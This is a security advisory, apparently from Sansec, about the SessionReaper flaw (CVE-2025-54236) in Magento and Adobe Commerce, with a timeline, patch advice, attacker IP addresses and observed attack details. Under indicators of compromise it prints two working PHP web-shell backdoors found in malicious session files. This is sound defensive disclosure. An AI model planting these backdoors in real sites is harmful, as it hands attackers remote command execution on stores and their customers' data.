SessionReaper, unauthenticated RCE in Magento & Adobe Commerce (CVE-2025-54236)

• Updated October 22nd: mass SessionReaper attacks have started

Adobe broke their regular release schedule to publish a fix for a critical (9.1) flaw in all versions of Adobe Commerce and Magento on September 8th. The bug, dubbed SessionReaper and assigned CVE-2025-54236, allows customer account takeover and unauthenticated remote code execution under certain conditions. Sansec was able to simulate the attack and so have less benign parties. It does not help that the Adobe patch was accidentally leaked before the official publication.

Adobe's official advisory describes the impact as "an attacker could take over customer accounts," however the actual risk is remote code execution (the worst kind of bug). The vulnerability researcher who discovered CVE-2025-54236 confirmed this on Slack:

SessionReaper is one of the more severe Magento vulnerabilities in its history, comparable to Shoplift (2015), Ambionics SQLi (2019), TrojanOrder (2022) and CosmicSting (2024). Each time, thousands of stores got hacked, sometimes within hours of the flaw being published.

Timeline

• Aug 22nd: Adobe internally discusses emergency fix
• Sep 4th: Adobe privately announces emergency fix to selected Commerce customers
• Sep 9th: Adobe releases emergency patch for SessionReaper - CVE-2025-54236 in APSB25-88
• Sep 19th: Ten days after patch release, fewer than 1 in 3 Magento stores has been patched. For Adobe Commerce Cloud, the figures are marginally better at 1 in 2.

• Oct 14th: Adobe releases official security patches that include SessionReaper fix
• Oct 22nd: Details published; First attacks detected; 38% of stores patched
• Oct 24th: Mass scans have reached about 31% of all Magento instances.

What should merchants do?

If you are already using Sansec Shield, you are protected against this attack.

If you are not using Sansec Shield, you should test and deploy the patch as soon as possible. Because the patch disables internal Magento functionality, chances are that some of your custom/external code will break. Adobe published a developer guide with instructions.

If you cannot safely apply the patch within the next 24 hours, you should activate a WAF for immediate protection. Only two WAFs block this attack right now: Adobe Fastly and Sansec Shield.

If you did deploy the patch but not within 24 hours of publication, we recommend to run a malware scanner like eComscan to find any signs of compromise on your system. We also recommend to rotate your secret crypt key, as leaking it would allow attackers to update your CMS blocks indefinitely.

How the attack works

Our security team successfully reproduced one possible avenue to exploit SessionReaper, but there are likely multiple vectors. While we cannot disclose technical details that could aid attackers, the vulnerability follows a familiar pattern from last year's CosmicSting attack. The attack combines a malicious session with a nested deserialization bug in Magento's REST API.

The specific remote code execution vector appears to require file-based session storage. However, we recommend merchants using Redis or database sessions to take immediate action as well, as there are multiple ways to abuse this vulnerability.

Active exploitation via /customer/address_file/upload

Sansec tracks ecommerce attacks in real-time around the globe. On October 22nd - 6 weeks after initial publication - we observed the first mass attacks in the wild. PHP backdoors are uploaded via /customer/address_file/upload as a fake session. This happens regardless of patch installation, as Adobe only fixed the session deserialization bug, not the unrestricted file upload issue.

If you found these malicious session files but you did patch in time, you are most likely safe. However we still recommend to remove these files and run a malware scan to see if the attack led to any backdoors throughout your code base.

Blocking the upload path is not sufficient to prevent the upload of malicious files, as Magento routing allows multiple ways in. Sansec Shield has been blocking these uploads since early September, make sure you are at least running v1.0.14.

• Follow live ecommerce attacks here.

Indicators of compromise

As of October 24th, we observed attack probes from dozens of IPs but these are the most common:

103.215.237.26
143.244.44.172
149.28.33.250
155.117.84.134
156.244.16.170
157.245.52.111
159.89.12.166
198.144.182.13
2001:19f0:6000:9a28:5400:5ff:feb8:8b4b
212.8.248.191
23.249.27.221
2a0a:3840:8078:25:0:504e:19d5:1337
34.227.25.4
44.212.43.34
45.32.66.51
54.205.171.35
54.226.181.219
80.78.25.213
86.203.185.51
99.246.176.115

Malicious session files may contain code that stores generic PHP backdoors in static.php, bootstrap.php, sysapi.php, gsfa1faewf.txt and several others.

<?php
if (!hash_equals('4009d3fa8132195a2dab4dfa3affc8d2', md5(md5($_REQUEST['pass'] ?? '')))) {
    header('Location:404.php');
    exit;
}
system($_REQUEST['cmd']);
?>

<?php @eval($_REQUEST['cmdddddd']);?>

Most attacks use GuzzleHttp\Cookie\FileCookieJar as serialized object with the GuzzleHttp\Cookie\SetCookie method.

In some cases it appears that the attacker is using a broken Eclipse on Windows setup to generate payloads, where the Eclipse error messages end up in the uploaded session file:

Warning: PHP Startup: Unable to load dynamic library 'bz2' (tried: E:\Tools\eclipse\php7.3\ext\bz2 (The specified module could not be found.), E:\Tools\eclipse\php7.3\ext\php_bz2.dll (The specified module could not be found.)) in Unknown on line 0

Acknowledgements

Credits to Blaklis for discovering the flaw.

Thanks to Scott Robinson, Pieter Hoste and Tu Van for additional research.

Sansec is not affiliated with Adobe and runs unbiased security research across the eCommerce ecosystem. Sansec protects 1 in 10 of all Magento stores worldwide.

Read more

• SessionReaper attacks have started, 3 in 5 stores still vulnerable
• Adobe patches critical Magento admin takeover via menu injection
• Backdoor found in popular ecommerce components
• Found defunct.dat on your site? You've got a problem.
• You have 2 weeks left to set up CSP for your store